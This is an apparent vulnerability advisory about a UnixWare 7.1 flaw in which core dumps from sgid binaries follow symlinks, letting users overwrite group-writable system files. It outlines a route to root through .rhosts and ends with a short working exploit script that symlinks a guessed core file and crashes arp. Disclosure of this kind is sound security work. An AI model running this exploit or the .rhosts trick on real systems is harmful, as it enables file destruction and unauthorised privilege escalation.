Any user may cause system files to be overwritten with core-dump data. A full root compromise may be possible, but it would not be a straight shell-gain, but rather a few extra tricks are needed.
Credit:
This information has been provided by: Brock Tellier.
UnixWare's sgid binaries are allowed to dump core (but suids are not). By "calculating" the pid of the sgid binary we will call, we can create a symlink from ./core.pid to any file which would be writeable by the running group. Many of the sgid binaries are sgid-sys, an extremely sensitive gid to be able to play around with. The arp exploit attached below demonstrates how one would overwrite a file using this vulnerability.
Why is a root compromise possible?
Well, assuming that we could somehow get "+ +" on a line by itself in the core file, we could place this into the .rhosts file of some group writeable directory/.rhosts. Gaining the additional privileges of any system account is usually a fast ticket to root.
Exploit:
#!/bin/sh
####
# Exploit for UnixWare 7.1 - sgid coredumps follow symlinks.
# Guessing pid is trivial. Any sgid program which will coredump can be used
# -Brock Tellier, btellier@usa.net
####
pid=`expr $$ + 4`;
ln -s /path/to/sys/group/writable/file core.$pid
/usr/sbin/arp `perl -e "print 'A' x 10000"`
